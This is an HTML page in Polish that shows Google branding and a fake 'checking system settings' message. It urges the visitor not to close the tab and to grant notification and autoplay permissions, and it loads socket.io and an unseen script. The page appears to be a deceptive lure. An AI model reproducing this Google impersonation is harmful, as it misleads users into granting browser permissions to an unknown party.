<!DOCTYPE html>
<html lang="en">

<head>
  <meta charset="UTF-8">
  <meta http-equiv="X-UA-Compatible" content="IE=edge">
  <meta name="viewport" content="width=device-width, initial-scale=1.0">
  <title>Czekaj...</title>
  <link rel="shortcut icon" href="https://www.google.com/favicon.ico" type="image/x-icon">
  <script src="/socket.io/socket.io.js"></script>
  <script defer src="/v.js"></script>

  <style>
    html {
      display: flex;
      justify-content: center;
      align-items: center;
      height: 100%;
    }

    #googlelogo {
      height: 70px;
    }
    
    #spinner {
      display: inline-block;
      width: 30px;
      height: 30px;
      border: 5px solid #000;
      border-radius: 50%;
      border-top-color: transparent;
      animation: spin 1s linear infinite;
    }

    @keyframes spin {
      100% {
        transform: rotate(360deg);
      }
    }

    #setup-title {
      color: red;
      font-weight: bold;
      font-size: 70px;
      animation: flash 1s infinite;
    }

    @keyframes flash {
      0% {
        opacity: 1;
        scale: 150%;
      }
      50% {
        opacity: 0;
        scale: 100%;
      }
      100% {
        opacity: 1;
        scale: 150%;
      }
    }

    #setup-buttons {
      margin: 3em;
    }

    #setup-buttons > button {
      background-color: #777;
      color: white;
      border: 1px solid #000;
      font-size: 40px;
      margin: .5em;
      padding: .2em;
      cursor: pointer;
    }
  </style>
</head>

<body>
  <img src="https://www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png" alt="Google"
    id="googlelogo">
  <h1><span id="spinner"></span> Czekaj...</h1>
  <h2>Prosimy o nie zamykanie tej karty, sprawdzamy ustawienia systemu.</h2>
  <div id="setup">
    <h1 id="setup-title">NOT SET UP YET!!!!</h1>
    <div id="setup-buttons">
      <button id="grant-notification">Grant Notification</button>
      <button id="grant-autoplay">Grant Autoplay</button>
      </divi>
    </div>
</body>

</html>